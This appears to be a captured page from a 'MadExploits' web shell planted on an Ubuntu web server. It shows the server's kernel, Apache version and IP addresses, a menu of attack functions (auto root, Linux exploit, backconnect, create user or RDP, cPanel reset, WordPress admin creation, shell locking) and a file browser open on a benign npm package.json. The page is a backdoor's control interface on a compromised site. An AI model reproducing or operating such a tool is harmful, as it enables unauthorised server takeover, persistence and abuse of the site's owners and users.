Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
broadway /
[ HOME SHELL ]
Name
Size
Permission
Action
bin
[ DIR ]
drwxrwxr-x
examples
[ DIR ]
drwxrwxr-x
lib
[ DIR ]
drwxrwxr-x
node_modules
[ DIR ]
drwxrwxr-x
test
[ DIR ]
drwxrwxr-x
.npmignore
38
B
-rw-rw-r--
.travis.yml
137
B
-rw-rw-r--
LICENSE
1.03
KB
-rw-rw-r--
README.md
2.68
KB
-rw-rw-r--
package.json
826
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "broadway", "description": "Lightweight application extensibility and composition with a twist of feature reflection.", "author": "Nodejitsu Inc. <info@nodejitsu.com>", "version": "0.3.6", "maintainers": [ "AvianFlu <avianflu@nodejitsu.com>", "indexzero <charlie@nodejitsu.com>", "Marak <marak@nodejitsu.com>" ], "repository": { "type": "git", "url": "http://github.com/flatiron/broadway.git" }, "dependencies": { "cliff": "0.1.9", "eventemitter2": "0.4.14", "nconf": "0.6.9", "winston": "0.8.0", "utile": "0.2.1" }, "devDependencies": { "codesurgeon": "0.3.x", "uglify-js": "1.0.6", "vows": "0.7.x" }, "scripts": { "test": "vows test/**/*-test.js --spec" }, "main": "./lib/broadway", "engines": { "node": ">= 0.6.4" } }
Close